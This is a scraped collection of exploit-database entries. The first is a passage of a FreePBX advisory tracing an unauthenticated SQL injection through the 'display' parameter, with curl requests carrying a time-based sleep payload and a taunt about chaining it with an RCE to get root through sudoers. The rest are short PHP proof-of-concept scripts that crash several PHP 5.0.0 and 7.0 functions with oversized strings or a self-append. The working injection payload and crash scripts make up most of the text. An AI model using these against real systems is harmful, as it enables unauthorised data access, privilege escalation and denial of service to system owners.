                $this->res = $this->db->prepare($sql);
    ------->>>>> $this->res->execute($params);
                return $this->res->fetchAll($fetch);
            }
            $this->res = $this->db->query($sql);
            if($this->res === false) {
                return false;
            }
            return $this->res->fetchAll($fetch);
        } catch (Exception $e) {
            return new DB_Error($e);
        }
    }

File : admin/libraries/modulefunctions.class.php
Line 593
        function getinfo($module = false, $status = false, $forceload = false) {

        global $amp_conf, $db;
        $modules = array();

        if ($module) {
            // get info on only one module
            $xml = $this->_readxml($module);
            if (!is_null($xml)) {
                $modules[$module] = $xml;
                // if status is anything else, it will be updated below when we read the db
                $modules[$module]['status'] = MODULE_STATUS_NOTINSTALLED;
            }

            // query to get just this one
    ---===>>>> $sql = 'SELECT * FROM modules WHERE modulename = "'.$module.'"';
        }
        if ($module || !$modulelist->is_loaded()) {
    ---===>>>$results = $db->getAll($sql,DB_FETCHMODE_ASSOC);
            if(DB::IsError($results)) {
                die_freepbx($sql."<br>\n".$results->getMessage());
            }
       
File : admin/libraries/modulefunctions.legacy.php
Line 52
        function module_getinfo($module = false, $status = false, $forceload = false) {
            _module_backtrace();
            $modulef = module_functions::create();
        ---===>>> return $modulef->getinfo($module, $status, $forceload);
        }

File : admin/views/noaccess.php
        <?php
        $display = isset($_REQUEST['display'])?$_REQUEST['display']:false;
    ---===>>> $modinfo = \module_getinfo($display);

'display' parameter is being passed to sql execute() func without perior sanitization which lead to obvious sql injection flaw without any pre-needed authentication

POC :

Normal request

[root:/fpbx]# curl -o /dev/null -s -w "Total request time : %{time_connect} + %{time_starttransfer} =  %{time_total}\n" 'http://x.x.x.x/admin/config.php?display=f4ris'
Total request time : 0.001 + 0.309 =  0.334

Sql injected

[root:/fpbx]# curl -o /dev/null -s -w "Total request time : %{time_connect} + %{time_starttransfer} =  %{time_total}\n" 'http://x.x.x.x/admin/config.php?display=f4ris"XOR(if(6661=6661,sleep(0.03),0))OR"*/'
Total request time : 0.158 + 4.391 =  4.417

# Mix this with the 13.0.35 RCE one , and you are ok to get root just by echoing asterisk to the sudoers ;)
# We're still ruling the game idiots , from Eg-R1z with dust xDD
# ./f4ris
HireHackking 
                        <?php
#############################################################################
## PHP 5.0.0 hw_docbyanchor() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("domxml")) die("You need domxml extension loaded!");

hw_docbyanchor(0,0);
?>
HireHackking 
                        <?php
#############################################################################
## PHP 5.0.0 imap_mail() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("imap")) die("You need imap extension loaded!");

$str = str_repeat('A', 9999);
imap_mail($str,'','');
?>
HireHackking 
<?php
#############################################################################
## PHP 5.0.0 fbird_[p]connect() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("interbase")) die("You need interbase extension loaded!");

$str = str_repeat('A', 9999);
//fbird_connect($str);
fbird_pconnect($str);
?>
HireHackking 
<?php
#############################################################################
## PHP 5.0.0 snmpwalk() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("snmp")) die("You need snmp extension loaded!");

$str = str_repeat('A', 9999);
snmpwalk('127.0.0.1', 'public', $str);
?>
HireHackking 
<?php
#############################################################################
## PHP 5.0.0 snmpwalkoid() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("snmp")) die("You need snmp extension loaded!");

$str = str_repeat('A', 9999);
snmpwalkoid('127.0.0.1', 'public', $str); 
?>
HireHackking 
                        <?php
#############################################################################
## PHP 5.0.0 html_doc_file() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("domxml")) die("You need domxml extension loaded!");

$str = str_repeat('A', 9999);
html_doc_file($str);
?>
HireHackking 
<?php
#############################################################################
## PHP 5.0.0 snmprealwalk() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("snmp")) die("You need snmp extension loaded!");

$str = str_repeat('A', 9999);
snmprealwalk('127.0.0.1', 'public', $str);
?>
HireHackking 
<?php
#############################################################################
## PHP 7.0 AppendIterator::append Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 7.0
## Date: 31/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
$tmp = new AppendIterator();
$tmp->append($tmp); // Crash
?>